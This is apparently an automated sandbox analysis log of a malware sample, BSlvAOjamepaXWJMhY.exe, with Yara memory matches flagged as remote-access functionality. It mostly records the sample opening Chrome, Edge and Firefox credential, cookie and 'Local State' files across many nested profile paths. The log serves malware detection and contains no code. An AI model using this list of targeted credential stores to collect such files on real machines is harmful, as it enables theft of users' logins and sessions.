                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003477000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.3319845623.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2204609907.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Providerbroker.exe PID: 6204, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: BSlvAOjamepaXWJMhY.exe PID: 5148, type: MEMORYSTR
                                    Source: Yara matchFile source: 9FwQYJSj4N.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.9FwQYJSj4N.exe.49354fb.0.raw.unpack, type: UNPACKEDPE
